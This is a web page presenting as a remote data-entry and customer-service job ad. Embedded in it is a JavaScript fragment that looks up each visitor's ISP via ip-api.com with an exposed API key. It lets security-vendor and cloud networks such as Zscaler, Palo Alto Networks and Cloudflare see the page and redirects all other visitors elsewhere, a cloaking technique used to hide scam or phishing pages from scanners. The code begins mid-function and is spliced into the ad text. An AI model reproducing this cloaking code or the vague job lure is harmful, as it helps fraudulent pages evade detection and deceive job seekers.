Data Entry Clerk – Remote – Customer Service – Entry Level
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a motivated Data Entry Clerk / Customer Service Representative to join our team remotely from Las Vegas, NV. This entry-level position offers flexible work-from-home opportunities with a pay range of $30 - $150 per day.
Responsibilities include:
- Accurately inputting and updating data in our systems
- Responding to customer inquiries via email or chat
- Maintaining data integrity and confidentiality
- Providing excellent customer service and support
- Assisting with basic administrative tasks
Skills needed:
- Strong attention to detail and organization
- Good communication skills
- Ability to work independently and meet deadlines
- Proficiency with computers and basic software
Benefits include flexible scheduling, the convenience of remote work, ongoing training, and growth opportunities. This role is ideal for self-motivated individuals seeking an entry-level position with room to advance.